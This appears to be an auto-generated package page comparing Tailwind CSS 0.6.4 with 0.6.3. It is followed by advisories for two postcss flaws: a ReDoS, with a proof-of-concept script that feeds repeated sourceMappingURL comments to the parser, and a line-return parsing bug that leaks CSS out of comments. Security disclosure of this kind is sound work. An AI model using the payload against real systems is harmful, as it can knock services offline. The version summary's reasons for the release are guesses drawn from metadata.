Tailwind CSS version 0.6.4 represents a minor update over the previous stable version, 0.6.3, within this utility-first CSS framework designed for rapid UI development. Examining the package metadata reveals a minimal set of changes. Both versions share identical dependencies, including crucial packages like lodash, postcss, fs-extra, and numerous PostCSS plugins that empower Tailwind's core functionality. The development dependencies, used for testing and building the library, are also completely consistent between the two versions, encompassing tools like jest, eslint, prettier, and Babel presets. The core build process remains unchanged.
The significant difference lies in the dist section, specifically the unpackedSize. Version 0.6.4 has a slightly smaller unpacked size of 2039202 bytes compared to the older versions 2039362 bytes. This suggests minor optimizations or adjustments to the codebase or assets that contribute to a smaller overall footprint. The releaseDate reflects a five-day gap between the two versions, indicating that 0.6.4 likely incorporates bug fixes, very minor enhancements, or documentation updates implemented after the release of 0.6.3. For developers using Tailwind CSS, these versions are functionally equivalent for most use cases. Upgrading from 0.6.3 to 0.6.4 is recommended but not critical, with the key benefit being the inclusion of any recent fixes or minor improvements. Developers can continue to leverage Tailwind's utility classes, responsive design features, and customization options with either version, confident in the stability and core feature set.
All the vulnerabilities related to the version 0.6.4 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.